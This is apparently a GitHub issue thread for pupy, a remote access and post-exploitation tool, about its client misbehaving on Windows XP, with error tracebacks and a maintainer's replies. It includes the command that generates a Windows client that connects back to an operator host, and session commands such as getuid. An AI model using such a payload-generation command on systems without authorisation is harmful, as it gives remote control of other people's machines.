### ISSUE TITLE
XP Support?

### ISSUE THREAD

**Issue by brimstone** [n1nj4sec/pupy#735]
I'm using b9bdcaccc7c49d4f6789d04a81baaf56e0762d5b, the unstable branch.
I'm using `Microsoft Windows XP [Version 5.1.2600]`
I generated a client with:
```
gen -O windows -f client -o pupy.exe connect -t http --host 192.168.0.24:443
```

I'm able to get a session to connect back, I can list processes with `ps`, however, `info` returns:
```
>> sessions -i 1
[+] Default filter set to 1
>> info
[!] Load pupwinutils.security failed: Exception: function 'InitializeProcThreadAttributeList' not found
2019-02-14 12:59:11,855| 'module' object has no attribute 'can_get_admin_access'

========= Remote Traceback (1) =========
Traceback (most recent call last):
AttributeError: 'module' object has no attribute 'can_get_admin_access'
Traceback (most recent call last):
  File "/pentest/pupy/pupy/pupylib/PupyJob.py", line 164, in module_worker
    module.run(self.args)
  File "/pentest/pupy/pupy/modules/get_info.py", line 46, in run
    'pupwinutils.security', 'can_get_admin_access', False)
  File "/pentest/pupy/pupy/pupylib/PupyClient.py", line 243, in remote
    remote_function = getattr(self.conn.modules[module], function)
  File "/usr/local/lib/python2.7/dist-packages/rpyc/core/netref.py", line 153, in __getattr__
    return syncreq(self, consts.HANDLE_GETATTR, name)
  File "/usr/local/lib/python2.7/dist-packages/rpyc/core/netref.py", line 72, in syncreq
    return conn.sync_request(handler, oid, *args)
  File "/pentest/pupy/pupy/network/lib/connection.py", line 387, in sync_request
    raise obj
AttributeError: 'module' object has no attribute 'can_get_admin_access'

========= Remote Traceback (1) =========
Traceback (most recent call last):
AttributeError: 'module' object has no attribute 'can_get_admin_access'

[-] 'module' object has no attribute 'can_get_admin_access'

========= Remote Traceback (1) =========
Traceback (most recent call last):
AttributeError: 'module' object has no attribute 'can_get_admin_access'
```

Similarly, `getuid` also gives errors, but does complete:
```
>> getuid
[!] Error loading package _scandir (_scandir.pyd pkg=False) : Traceback (most recent call last):
ImportError: MemoryLoadLibrary failed loading _scandir.pyd
[!] Load ntfs_streams failed: Exception: function 'FindFirstStreamW' not found
[+] Administrator
```
These do work on Windows 10.

**Comment by alxchk** [comment]
XP should work starting from SP2, but yes, some things may be broken. Basic things should work, but not all. At least I have issues with impersonation, fast search, ntfs streams etc.
"can_get_admin_access" issue looks pretty old, at least I don't have this on caac8075

```
release        XP                                                  
version        5.1.2600                                            
os_arch        x86                                                 
proc_arch      32bit     
```

You can post issues here, but a lot of windows XP can't be fixed without pain

**Comment by brimstone** [comment]
Github is confusing how it linked to caac807 in this repo and not in alxchk/pupy. That commit does infact not give errors around the `info` command on XP. Maybe some of those changes can get merged into this repo?

**Comment by alxchk** [comment]
That repo is like dev branch. I'm merging with this one once things works more or less as expected. Also docker images generated from that repo
